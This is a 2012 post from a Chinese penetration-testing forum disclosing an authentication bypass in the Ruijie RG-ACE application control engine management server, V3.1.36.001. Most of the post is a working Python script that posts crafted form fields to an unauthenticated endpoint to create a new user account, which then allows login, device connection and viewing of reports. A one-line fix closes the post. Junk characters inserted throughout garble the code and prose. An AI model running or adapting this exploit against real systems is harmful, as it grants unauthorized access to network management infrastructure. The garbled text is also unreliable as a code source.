找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 锐捷应用控制引擎管理服务器可以增加用户
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1949|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)- b6 u' A- x6 q$ S; r" Q; \
$ g/ Z6 U. k+ q2 h

3 k/ k! W. m$ l9 y测试的具体版本是
4 u6 }  }' u: ?4 w/ z产品名称: 锐捷应用控制引擎
! [6 L. }9 [( e1 x' `6 ^. I版本号: 3.1.36.001 TC3 j- S- P; D7 ?, }
编译时间: 201104291730
( H; S0 J2 S0 W. l2 X* a" U % g) x% g/ E; t! J- O
1 T+ ]# N3 `" }  Z# w! c  i8 F9 z* `
漏洞证明:/ [  w% e' v. P0 v' e

8 w; s: [0 O- W* V6 x
- H  u9 |+ G. s4 g8 S0 ?! r4 ^" e* Q( G$ i) i9 s

: i6 L  A3 q  _& N9 `
. N8 X& N9 E, n+ V9 W: M$ D' a; c. X, I  e
执行脚本! O" w5 d- ]5 a! q
#! /usr/bin/env python$ u$ y/ l- p& _$ K% c3 S$ X
#coding=gbk. z- k# M# G; [4 |/ x# ~
#RG-ACE管理服务器 V3.1.36.001
4 [4 c" ^8 l2 j* F- ~; d% M' Oimport urllib2, urllib,cookielib
( ]6 m$ ?' D4 b& `% h1 y* |6 Purl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP4 X2 K% v2 T' x5 s8 {' i1 B& |
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))0 Q0 ?* F. i8 K# g3 Y2 O1 W
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
7 Z2 D* ^% V2 i9 O9 \) @  Fpost=(("event","userManager.doInsertUserInfo"),& A5 C7 E: B  H' B/ U7 C
("useractionname","addButtonValue"),2 I4 ?! O3 }9 T$ o2 K3 [
("useropermanager","userManager"),
8 T5 H1 b  h% ~+ u("userName","t"), #######账号自己加
5 E/ x  R8 t* A+ Q("pwd","aaaaaa"),######密码自己加4 u  b0 K4 _& k7 F, t( p
("trueName","ad"),
' |0 x2 U# h3 V1 r4 d+ _# s" [% b/ L("email",""),
1 v; \" M& Z9 G/ n8 s6 o% X("mobilePhone",""),3 O) T7 l# {$ r. F2 H
("officePhone",""),0 e% C- {) C4 S* b2 ^6 Q
("addr",""),; J! n% v9 i! @6 v/ F
("submit","确定"))! n+ |8 j8 R# h; M. j+ r. c
urllib2.install_opener(opener)+ U' }& j7 A% i6 M% Q
p=urllib2.urlopen(url, urllib.urlencode(post)).read()& _7 J1 R1 e+ I0 Z! N* r& ?1 D
print "Done") m# p7 p% u' k+ A# n
) ?# n! [5 T# S* w) h
登录,连接设备2 |& L  s2 Q# @) s. B7 |1 b' m
! M; V! C0 x9 a6 C8 i8 x
- Q& u% R( [% S6 ?' V# a! E+ R2 K
; ~5 o2 y; g" r6 y$ k9 E5 C: s
$ t& S0 I% [$ m. H: g; C

( M) h+ Z* S1 _: z默认的管理员admin权限更大点% m4 r5 O; ^! w0 d
/ `# b% F- T/ i+ O
5 h7 y$ j9 T+ H, j: _! S

# c. S7 c- M1 v# s. ^% O8 r- {3 x , c# @+ `% q# A, v# L
9 ~  c6 ?( }; r0 t2 W% s
修复方案:
4 v5 [( ?( M( q7 u  N: b加强对接口的权限验证9 n7 H8 B# e& c* z: L  r3 W
: G2 T9 r2 x' o! @& P
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表